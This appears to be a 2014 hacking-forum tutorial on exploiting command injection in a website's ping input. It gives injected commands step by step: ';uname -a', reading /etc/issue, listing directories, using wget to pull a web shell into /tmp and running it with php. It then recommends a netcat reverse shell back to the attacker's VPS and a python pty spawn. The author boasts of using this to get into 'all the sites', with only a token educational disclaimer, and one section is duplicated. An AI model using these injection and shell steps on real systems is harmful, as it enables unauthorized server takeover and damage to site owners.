[Tutorial][HQ] Remote Code Execution [Noob Friendly]

by **Admin** Tue Jul 29, 2014 2:50 pm

Disclaimer
I am not responsible for how you use this tutorial its was created for educational purposes.

Intro
Hello guys and welcome to my tutorial on Remote Code Execution (RCE),
I will not be providing any real targets but will be providing a realistic example,
RCE is a very useful exploit as it lets you execute direct commands to the system,
Therefore allowing us to upload files, delete files and manipulate the system how we wish.

How RCE happens
RCE most commonly happens via unsanitized input on a website input,
For example in this tutorial we will be using a ping IP input shown in the image below.
[You must be registered and logged in to see this image.]" />

Check target
Okay so with the example I have provided it was relatively simple to check if it was vulnerable by adding ";" without quotes into the input box, followed by a Nix* example below
Code:
;uname -a

By adding ";" this is a concatenate "Joins an extra command to supplied argument"
The following image will show the output of what we have entered.

Check target
Okay so with the example I have provided it was relatively simple to check if it was vulnerable by adding ";" without quotes into the input box, followed by a Nix* example below
Code:
;uname -a
By adding ";" this is a concatenate "Joins an extra command to supplied argument"
The following image will show the output of what we have entered.

[You must be registered and logged in to see this image.]" />

Okay so now what
Okay so we have found that via the input we have been able to execute a Nix* command to display box info,
Now what else is there we can do hmm... Okay lets try pull up what os the box is running with the following command,
Code:
;cat /etc/issue
This command has provided us the info of the boxes OS as shown below

[You must be registered and logged in to see this image.]" />

Well that was cool
Okay so we now found some minor useless info,
I am sure you are thinking no more minor stuff lets move on to get "r00t".
Now lets try list the current directory with "ls".

[You must be registered and logged in to see this image.]" />

We have got no output!?! I guess its not that vulnerable lets move on shall we...
WRONG! Just means the current directory is not able to be listed.
As shown before ";" is for concatenate so lets try join 2 commands by doing the following to move up a directory then list.
Code:
;cd ..;ls

[You must be registered and logged in to see this image.]" />

Success we listed the directories. +1 to you sir!
Now its a wide known fact that the tmp directory is usually writeable so lets navigate there and list by entering the following code.
Code:
;cd [You must be registered and logged in to see this image.]" />..;cd tmp;ls

Woo! We listed a writable director now lets try wget a shell to this directory by entering this code;
Code:
;cd ..;cd tmp;wget [You must be registered and logged in to see this link.] > a.php

[You must be registered and logged in to see this link.]" />

Now your shell has been uploaded you could access the shell via terminal by entering,
Code:
;cd ..;cd tmp;php a.php

Alternative to a web shell
Okay so my favourite way of gaining access to all the sites is the following way,
Test for vulnerable input and instead of executing a bunch of system commands try to spawn a shell and back connect via netcat on a VPS.
now for the actual codes to spawn a shell on the server I suggest trying the following examples they have always served me well;
[You must be registered and logged in to see this link.]
Obviously change "10.0.0.1" to your VPS IP and change the port I suggest using port 443 as its commonly open.
From there for ease of use I will normally spawn a (Pseudo Terminal) PTY shell from bash by using the following code
Code:
;python -c 'import pty; pty.spawn("/bin/bash")'

Tutorial written 100% by me.

I really hope that you enjoyed this tutorial as much as I enjoyed writing it!
Thanks for reading guys.